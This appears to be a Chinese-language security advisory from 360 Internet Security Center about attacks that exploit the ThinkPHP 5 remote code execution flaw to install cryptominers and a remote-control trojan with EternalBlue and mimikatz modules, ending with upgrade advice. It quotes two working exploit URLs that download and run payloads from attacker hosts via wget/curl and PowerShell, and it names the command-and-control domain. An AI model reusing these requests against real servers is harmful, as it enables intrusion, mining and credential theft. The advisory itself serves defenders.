ThinkPHP是一款基於PHP的Web應用程序開發框架,它開源並且有著廣泛的流行度,據統計,目前有超過50萬臺服務器正運行ThinkPHP(數據來源於Think PHP官網)。
近期ThinkPHP發佈了一個安全更新,用於修復未經身份驗證的高風險遠程代碼執行(RCE)漏洞,360Cert也曾針對該漏洞發佈過預警(https://cert.360.cn/warning/detail?id=09c85b4e91623c92fc4e21d6cd9b1332)。而最近,我們則監測到利用這個已被披露的ThinkPHP RCE漏洞發起攻擊的案例:黑客利用此漏洞在運行有未打補丁的ThinkPHP的服務器上(包含Windows、Linux)安裝遠控、挖礦、永恆之藍攻擊模塊等。
攻擊流程示意圖
其一,利用ThinkPHP RCE漏洞進行挖礦:
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp;wget hxxp://205.185.113.123/ex.sh;curl hxxp://205.185.113.123/ex.sh -O;chmod 777 ex.sh;sh ex.sh
下載挖礦木馬的shell腳本
其二,利用ThinkPHP RCE漏洞執行多功能綜合木馬:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://a46.bulehero.in/download.exe','C:/12.exe');start C:/12.exe
被下載到本地的Download.exe為集遠控、挖礦、永恆之藍攻擊等多合一的木馬:
其中,挖礦模塊參數如下:
挖礦模塊參數
從錢包地址查看,已經有146個門羅幣的進帳:
錢包地址相關信息
Download.exe中的永恆之藍攻擊模塊:
永恆之藍攻擊模塊
木馬會獲取本地IP段,並隨機生成部分IP段進行永恆之藍攻擊嘗試:
基於永恆之藍模塊發起的攻擊
此外,木馬還會調用mimikatz獲取windows賬號的密碼:
調用mimkatz獲取windows系統賬號
最後,木馬還帶有遠控模塊,其上線地址為:a45[.]bulehero[.]in
遠控功能模塊
遠控連接
360互聯網安全中心提醒廣大站長:
1. 將ThinkPHP升級到5.0.23或5.1.31以上的版本,以解決此問題。
2. 如果您正在使用基於ThinkPHP5的CMS(網站內容管理系統),也可能會受此漏洞影響,同樣建議對其進行升級。
3. 服務器及時安裝系統漏洞補丁並使用安全軟件進行防護。
附:ThinkPHP相關說明的官網鏈接:https://blog.thinkphp.cn/869075
ThinkPHP5安全更新說明
閱讀更多 360安全衛士 的文章
